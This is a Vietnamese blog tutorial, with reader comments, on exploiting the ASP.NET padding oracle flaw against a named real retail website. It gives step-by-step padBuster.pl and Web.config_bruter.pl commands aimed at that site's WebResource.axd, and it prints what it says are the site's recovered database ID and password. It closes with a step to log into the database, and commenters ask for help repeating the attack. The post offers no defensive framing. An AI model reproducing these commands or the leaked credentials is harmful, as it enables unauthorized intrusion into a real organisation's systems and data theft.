Thứ Sáu, 29 tháng 6, 2012

[Tut] Padding Orale Attack





 
Kiểm tra lỗi Padding Orale



View source:



Chú ý đoạn code sau:
/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2&t=634538991637902500" 


Bước 1: Chuẩn bị Tools

Trước tiên cần cài đặt perl:

Coppy 2 file  padBuster.pl và Web.config_bruter.pl sau vào ổ C:

padBuster.pl:
Web.config_bruter.pl:
pass unlock: soleil_vhb
pass giải nén: ceh.vn





Bước 2:  Thực hiện lệnh trên CMD

vào Run command

Cd\

Chạy lệnh:
padBuster.pl http://bigc.vn/WebResource.axd?d=OpduU2rj_NJHaBhjNiUZ7g2 OpduU2rj_NJHaBhjNiUZ7g2 8 -encoding 3 -plaintext "|||~/web.config"





Đến bước này đợi 1 lát, nó sẽ chạy cho đến dòng:

“The ID# marked with **  is recommended: “

Lúc này ta sẽ nhập số 2 và ấn enter






Chờ đợi tầm 30 phút chương trình sẽ giải mã ra giá trị sau:

M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0




Sau khi có giá trị kết quả giải mã, thực hiện tiếp câu lệnh:

Web.config_bruter.pl http://bigc.vn/WebResource.axd M0-Q6vb5oiWPYJMC3WdcQgAAAAAAAAAA0 8

Đợi chương trình biên dịch xong ( Tầm 1 tiếng ) ta sẽ có kết quả như sau: 






Kết quả: 

 u2LzoCD0ZcozT5Dq9vm iJY9gkwLdZ1xCAAAAAAAAAAA1

 gPdbQmmzWIEzT5Dq9vmiJY9gkwLdZ1xCAAAAAAAAAAA1

Mỗi lần biên dịch, chương trình sẽ cho ra 1 giá trị khác nhau nhưng link đều đưa về cùng 1 kết quả




Bước 3: Lấy thông tin file config:


hoặc:

Ta được thông tin sau: ID=bigc;Password=RrmX6W6ODi





Bước 4: login vào Database




Sử dụng tool: MySQL management studio express









4 nhận xét:

Nặc danh nói...

Bạn cho mình hỏi mình đã làm ok hết, nhưng bước web.config.bructer.pl mình chờ cả ngày mà nó ko báo gì hết, mình đùng cả server 3.2G Sandy birge để chạy mà cũng vậy không biết sao bạn có thể hướng dẫn giúp.

heaven nói...

bài viết rất hay.mình rất thích vào đọc blog của bạn mong bạn có nhiều bài tut hay như vậy.

Unknown nói...

Đang cài Perl trên Window 7 64bits bị lỗi
Can't locate Crypt/SSLeay.pm in @INC (@INC contains: C:/Perl64/site/lib C:/Perl6
4/lib .) at C:\padBuster.pl line 22.
BEGIN failed--compilation aborted at C:\padBuster.pl line 22.
Không biết bị lỗi gì. Dũng có gì xem giúp mình nhé. Thanks

Unknown nói...

Đã khắc phục được lỗi bằng cài gói crypt-SSleay. Nhưng lại gặp lỗi không hiển thị
“The ID# marked with ** is recommended: “ không biết sai bước nào không!

Đăng nhận xét